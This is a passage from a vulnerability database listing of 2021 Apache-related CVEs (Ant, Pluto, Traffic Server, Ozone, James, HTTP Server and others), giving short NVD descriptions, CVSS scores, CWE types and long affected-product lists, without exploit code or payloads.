oracle retail_predictive_application_server 15.0.3
oracle utilities_framework 4.4.0.3.0
oracle retail_xstore_point_of_service 19.0.2
oracle retail_integration_bus 15.0.4.0
oracle communications_cloud_native_core_binding_support_function 1.11.0
oracle retail_point-of-service 14.1
oracle retail_service_backbone 14.1.3.2
oracle retail_service_backbone 19.0.1.0
CVE-2021-36374 MEDIUM

When reading a specially crafted ZIP archive, or a derived formats, an Apache Ant build can be made to allocate large amounts of memory that leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Commonly used derived formats from ZIP archives are for instance JAR files and many office files. Apache Ant prior to 1.9.16 and 1.10.11 were affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-130,NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle retail_financial_integration 16.0.3.0
oracle communications_unified_inventory_management 7.4.2
oracle real-time_decision_server 3.2.0.0
oracle agile_engineering_data_management 6.2.1.0
oracle retail_eftlink 19.0.1
oracle communications_unified_inventory_management 7.4.0
oracle retail_financial_integration 15.0.4.0
oracle communications_cloud_native_core_automated_test_suite 1.9.0
oracle retail_bulk_data_integration 19.0.1
oracle utilities_framework 4.4.0.0.0
oracle retail_bulk_data_integration 16.0.3.0
oracle retail_eftlink 20.0.1
oracle retail_central_office 14.1
oracle primavera_gateway *
oracle retail_xstore_point_of_service 20.0.1
oracle banking_trade_finance 14.5
oracle retail_store_inventory_management 16.0
oracle agile_plm 9.3.6
oracle communications_unified_inventory_management 7.5.0
oracle primavera_unifier *
oracle utilities_framework 4.2.0.3.0
oracle retail_xstore_point_of_service 18.0.3
oracle retail_integration_bus 19.0.1.0
oracle retail_xstore_point_of_service 16.0.6
oracle retail_merchandising_system 19.0.1
oracle insurance_policy_administration *
oracle retail_advanced_inventory_planning 14.1
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle health_sciences_information_manager 3.0.0.1
oracle retail_back_office 14.0
oracle retail_point-of-service 14.0
oracle retail_invoice_matching 16.0.3
oracle banking_treasury_management 14.5
oracle retail_extract_transform_and_load 13.2.8
oracle retail_predictive_application_server 16.0.3.0
oracle retail_central_office 14.0
oracle primavera_unifier 19.12
oracle retail_advanced_inventory_planning 16.0
oracle retail_advanced_inventory_planning 15.0
oracle utilities_framework 4.2.0.2.0
oracle communications_order_and_service_management 7.3
oracle retail_store_inventory_management 14.1
oracle retail_back_office 14.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle utilities_framework 4.4.0.2.0
oracle retail_financial_integration 14.1.3.2
oracle retail_integration_bus 16.0.3.0
oracle enterprise_repository 11.1.1.7.0
oracle timesten_in-memory_database *
oracle financial_services_analytical_applications_infrastructure *
oracle communications_order_and_service_management 7.4
oracle communications_unified_inventory_management 7.3.0
apache ant *
oracle retail_integration_bus 14.1.3.2
oracle retail_service_backbone 16.0.3.0
oracle communications_unified_inventory_management 7.4.1
oracle retail_predictive_application_server 14.1.3
oracle utilities_framework *
oracle communications_diameter_intelligence_hub *
oracle retail_store_inventory_management 15.0
oracle product_lifecycle_analytics 3.6.1
oracle retail_service_backbone 15.0.4.0
oracle real-time_decision_server 11.1.1.9.0
oracle primavera_unifier 20.12
oracle retail_predictive_application_server 15.0.3
oracle health_sciences_information_manager *
oracle utilities_framework 4.4.0.3.0
oracle retail_xstore_point_of_service 19.0.2
oracle retail_integration_bus 15.0.4.0
oracle communications_cloud_native_core_binding_support_function 1.11.0
oracle retail_point-of-service 14.1
oracle retail_service_backbone 14.1.3.2
oracle retail_service_backbone 19.0.1.0
CVE-2021-36737 MEDIUM

The input fields of the Apache Pluto UrlTestPortlet are vulnerable to Cross-Site Scripting (XSS) attacks. Users should migrate to version 3.1.1 of the v3-demo-portlet.war artifact

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache pluto *
CVE-2021-36738 MEDIUM

The input fields in the JSP version of the Apache Pluto Applicant MVCBean CDI portlet are vulnerable to Cross-Site Scripting (XSS) attacks. Users should migrate to version 3.1.1 of the applicant-mvcbean-cdi-jsp-portlet.war artifact

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache pluto *
CVE-2021-36739 MEDIUM

The "first name" and "last name" fields of the Apache Pluto 3.1.0 MVCBean JSP portlet maven archetype are vulnerable to Cross-Site Scripting (XSS) attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache pluto 3.1.0
CVE-2021-36749 MEDIUM

In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache druid *
CVE-2021-36774 MEDIUM

Apache Kylin allows users to read data from other database systems using JDBC. The MySQL JDBC driver supports certain properties, which, if left unmitigated, can allow an attacker to execute arbitrary code from a hacker-controlled malicious MySQL server within Kylin server processes. This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache kylin *
CVE-2021-37147 MEDIUM

Improper input validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-444,CWE-20,CWE-444,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-37148 MEDIUM

Improper input validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-37149 MEDIUM

Improper Input Validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-37150

Improper Input Validation vulnerability in header parsing of Apache Traffic Server allows an attacker to request secure resources. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 36
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-37404 HIGH

There is a potential heap buffer overflow in Apache Hadoop libhdfs native code. Opening a file path provided by user without validation may result in a denial of service or arbitrary code execution. Users should upgrade to Apache Hadoop 2.10.2, 3.2.3, 3.3.2 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,CWE-787,

Products Affected

Vendor Product Version
apache hadoop *
CVE-2021-37533

Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client. The default in version 3.9.0 is now false to ignore such hosts, as cURL does. See https://issues.apache.org/jira/browse/NET-711.

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache commons_net *
debian debian_linux 11.0
CVE-2021-37578 MEDIUM

Apache jUDDI uses several classes related to Java's Remote Method Invocation (RMI) which (as an extension to UDDI) provides an alternate transport for accessing UDDI services. RMI uses the default Java serialization mechanism to pass parameters in RMI invocations. A remote attacker can send a malicious serialized object to the above RMI entries. The objects get deserialized without any check on the incoming data. In the worst case, it may let the attacker run arbitrary code remotely. For both jUDDI web service applications and jUDDI clients, the usage of RMI is disabled by default. Since this is an optional feature and an extension to the UDDI protocol, the likelihood of impact is low. Starting with 3.3.10, all RMI related code was removed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache juddi *
CVE-2021-37579 HIGH

The Dubbo Provider will check the incoming request and the corresponding serialization type of this request meet the configuration set by the server. But there's an exception that the attacker can use to skip the security check (when enabled) and reaching a deserialization operation with native java serialization. Apache Dubbo 2.7.13, 3.0.2 fixed this issue by quickly fail when any unrecognized request was found.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-37580 HIGH

A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,CWE-287,

Products Affected

Vendor Product Version
apache shenyu 2.4.0
apache shenyu 2.3.0
CVE-2021-37608 HIGH

Unrestricted Upload of File with Dangerous Type vulnerability in Apache OFBiz allows an attacker to execute remote commands. This issue affects Apache OFBiz version 17.12.07 and prior versions. Upgrade to at least 17.12.08 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12297.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,CWE-434,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2021-37839 MEDIUM

Apache Superset up to 1.5.1 allowed for authenticated users to access metadata information related to datasets they have no permission on. This metadata included the dataset name, columns and metrics.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-273,CWE-273,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-38153 MEDIUM

Some components in Apache Kafka use `Arrays.equals` to validate a password or key, which is vulnerable to timing attacks that make brute force attacks for such credentials more likely to be successful. Users should upgrade to 2.8.1 or higher, or 3.0.0 or higher where this vulnerability has been fixed. The affected versions include Apache Kafka 2.0.0, 2.0.1, 2.1.0, 2.1.1, 2.2.0, 2.2.1, 2.2.2, 2.3.0, 2.3.1, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.6.0, 2.6.1, 2.6.2, 2.7.0, 2.7.1, and 2.8.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-203,CWE-203,

Products Affected

Vendor Product Version
oracle primavera_unifier 20.12
oracle primavera_unifier 21.12
oracle financial_services_enterprise_case_management 8.0.7.1
oracle communications_brm_-_elastic_charging_engine *
oracle communications_brm_-_elastic_charging_engine 12.0.0.5.0
oracle financial_services_analytical_applications_infrastructure *
oracle primavera_unifier 18.8
oracle financial_services_behavior_detection_platform 8.1.2.0
oracle financial_services_enterprise_case_management 8.1.1.0
oracle financial_services_behavior_detection_platform *
quarkus quarkus *
oracle primavera_unifier 19.12
oracle financial_services_enterprise_case_management 8.0.8.1
oracle communications_cloud_native_core_policy 1.15.0
oracle financial_services_enterprise_case_management 8.0.8.0
apache kafka 2.8.0
oracle financial_services_behavior_detection_platform 8.1.1.1
oracle financial_services_enterprise_case_management 8.1.1.1
apache kafka *
oracle financial_services_behavior_detection_platform 8.1.1.0
oracle financial_services_enterprise_case_management 8.0.7.2
CVE-2021-38161 MEDIUM

Improper Authentication vulnerability in TLS origin verification of Apache Traffic Server allows for man in the middle attacks. This issue affects Apache Traffic Server 8.0.0 to 8.0.8.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,CWE-287,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2021-38294 HIGH

A Command Injection vulnerability exists in the getTopologyHistory service of the Apache Storm 2.x prior to 2.2.1 and Apache Storm 1.x prior to 1.2.4. A specially crafted thrift request to the Nimbus server allows Remote Code Execution (RCE) prior to authentication.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,CWE-78,

Products Affected

Vendor Product Version
apache storm *
CVE-2021-38295 MEDIUM

In Apache CouchDB, a malicious user with permission to create documents in a database is able to attach a HTML attachment to a document. If a CouchDB admin opens that attachment in a browser, e.g. via the CouchDB admin interface Fauxton, any JavaScript code embedded in that HTML attachment will be executed within the security context of that admin. A similar route is available with the already deprecated _show and _list functionality. This privilege escalation vulnerability allows an attacker to add or remove data in any database or make configuration changes. This issue affected Apache CouchDB prior to 3.1.2

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.3 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 1.3 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache couchdb *
CVE-2021-38296 MEDIUM

Apache Spark supports end-to-end encryption of RPC connections via "spark.authenticate" and "spark.network.crypto.enabled". In versions 3.1.2 and earlier, it uses a bespoke mutual authentication protocol that allows for full encryption key recovery. After an initial interactive attack, this would allow someone to decrypt plaintext traffic offline. Note that this does not affect security mechanisms controlled by "spark.authenticate.enableSaslEncryption", "spark.io.encryption.enabled", "spark.ssl", "spark.ui.strictTransportSecurity". Update to Apache Spark 3.1.3 or later

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-294,CWE-294,

Products Affected

Vendor Product Version
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
apache spark *
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
CVE-2021-38540 HIGH

The variable import endpoint was not protected by authentication in Airflow >=2.0.0, <2.1.3. This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. This issue affects Apache Airflow >=2.0.0, <2.1.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-269,CWE-306,

Products Affected

Vendor Product Version
apache airflow *
CVE-2021-38542 MEDIUM

Apache James prior to release 3.6.1 is vulnerable to a buffering attack relying on the use of the STARTTLS command. This can result in Man-in -the-middle command injection attacks, leading potentially to leakage of sensible information.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-77,CWE-327,

Products Affected

Vendor Product Version
apache james *
CVE-2021-38555 MEDIUM

An XML external entity (XXE) injection vulnerability was discovered in the Any23 StreamUtils.java file and is known to affect Any23 versions < 2.5. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache any23 *
CVE-2021-39231 MEDIUM

In Apache Ozone versions prior to 1.2.0, Various internal server-to-server RPC endpoints are available for connections, making it possible for an attacker to download raw data from Datanode and Ozone manager and modify Ratis replication configuration.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,CWE-862,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-39232 MEDIUM

In Apache Ozone versions prior to 1.2.0, certain admin related SCM commands can be executed by any authenticated users, not just by admins.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,CWE-862,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-39233 MEDIUM

In Apache Ozone versions prior to 1.2.0, Container related Datanode requests of Ozone Datanode were not properly authorized and can be called by any client.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,NVD-CWE-Other,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-39234 MEDIUM

In Apache Ozone versions prior to 1.2.0, Authenticated users knowing the ID of an existing block can craft specific request allowing access those blocks, bypassing other security checks like ACL.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N 1.6 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-863,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-39235 MEDIUM

In Apache Ozone before 1.2.0, Ozone Datanode doesn't check the access mode parameter of the block token. Authenticated users with valid READ block token can do any write operation on the same block.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-732,CWE-732,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-39236 MEDIUM

In Apache Ozone before 1.2.0, Authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating any other user.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,CWE-862,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-39239 MEDIUM

A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache jena *
CVE-2021-39275 HIGH

ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache http_server *
siemens sinema_server 14.0
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
siemens sinec_nms *
debian debian_linux 11.0
netapp clustered_data_ontap -
fedoraproject fedora 35
netapp cloud_backup -
fedoraproject fedora 34
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
netapp storagegrid -
CVE-2021-40110 MEDIUM

In Apache James, using Jazzer fuzzer, we identified that an IMAP user can craft IMAP LIST commands to orchestrate a Denial Of Service using a vulnerable Regular expression. This affected Apache James prior to 3.6.1 We recommend upgrading to Apache James 3.6.1 or higher , which enforce the use of RE2J regular expression engine to execute regex in linear time without back-tracking.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache james *
CVE-2021-40111 MEDIUM

In Apache James, while fuzzing with Jazzer the IMAP parsing stack, we discover that crafted APPEND and STATUS IMAP command could be used to trigger infinite loops resulting in expensive CPU computations and OutOfMemory exceptions. This can be used for a Denial Of Service attack. The IMAP user needs to be authenticated to exploit this vulnerability. This affected Apache James prior to version 3.6.1. This vulnerability had been patched in Apache James 3.6.1 and higher. We recommend the upgrade.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache james *
CVE-2021-40146 HIGH

A Remote Code Execution (RCE) vulnerability was discovered in the Any23 YAMLExtractor.java file and is known to affect Any23 versions < 2.5. RCE vulnerabilities allow a malicious actor to execute any code of their choice on a remote machine over LAN, WAN, or internet. RCE belongs to the broader class of arbitrary code execution (ACE) vulnerabilities.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache any23 *
CVE-2021-40331

An Incorrect Permission Assignment for Critical Resource vulnerability was found in the Apache Ranger Hive Plugin. Any user with SELECT privilege on a database can alter the ownership of the table in Hive when Apache Ranger Hive Plugin is enabled This issue affects Apache Ranger Hive Plugin: from 2.0.0 through 2.3.0. Users are recommended to upgrade to version 2.4.0 or later.

Products Affected

Vendor Product Version
apache ranger *
CVE-2021-40369 MEDIUM

A carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the Denounce plugin, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.0 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2021-4040

A flaw was found in AMQ Broker. This issue can cause a partial interruption to the availability of AMQ Broker via an Out of memory (OOM) condition. This flaw allows an attacker to partially disrupt availability to the broker through a sustained attack of maliciously crafted messages. The highest threat from this vulnerability is system availability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

Products Affected

Vendor Product Version
redhat amq_broker *
apache activemq_artemis *
CVE-2021-40438 MEDIUM

A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.0 CRITICAL CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H 2.2 6.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,CWE-918,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
siemens sinema_server 14.0
redhat enterprise_linux_update_services_for_sap_solutions 8.2
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_eus 8.2
oracle http_server 12.2.1.4.0
redhat enterprise_linux_update_services_for_sap_solutions 8.1
redhat jboss_core_services 1.0
siemens sinema_remote_connect_server 3.2
oracle enterprise_manager_ops_center 12.4.0.0
redhat enterprise_linux_for_arm_64_eus 8.8
netapp clustered_data_ontap -
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.1
redhat enterprise_linux_server_update_services_for_sap_solutions 7.6
redhat enterprise_linux_for_power_little_endian_eus 8.8
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.3
resf rocky_linux 8.0
redhat enterprise_linux_server_tus 8.6
broadcom brocade_fabric_operating_system_firmware -
redhat enterprise_linux_for_power_little_endian_eus 8.1
redhat enterprise_linux_server_tus 8.8
oracle http_server 12.2.1.3.0
redhat enterprise_linux_for_power_little_endian 8.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
redhat enterprise_linux_eus 8.4
redhat enterprise_linux_for_power_big_endian 7.0
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.4
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 7.7
redhat enterprise_linux_for_power_little_endian_eus 8.2
redhat enterprise_linux_server 7.0
redhat enterprise_linux_for_power_little_endian 7.0
redhat enterprise_linux_server_update_services_for_sap_solutions 7.7
apache http_server *
redhat enterprise_linux_for_ibm_z_systems_eus_s390x 8.2
redhat enterprise_linux_server_tus 7.6
redhat enterprise_linux_for_power_little_endian_eus 8.4
oracle instantis_enterprisetrack 17.1
redhat enterprise_linux_update_services_for_sap_solutions 8.6
redhat enterprise_linux_eus 8.8
redhat enterprise_linux_for_ibm_z_systems_eus 8.8
debian debian_linux 10.0
oracle secure_global_desktop 5.6
redhat enterprise_linux_update_services_for_sap_solutions 8.4
fedoraproject fedora 35
netapp cloud_backup -
redhat enterprise_linux_server_tus 8.4
redhat enterprise_linux_for_scientific_computing 7.0
fedoraproject fedora 34
redhat enterprise_linux_for_ibm_z_systems_eus 8.1
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.2
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.6
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_for_ibm_z_systems 8.0
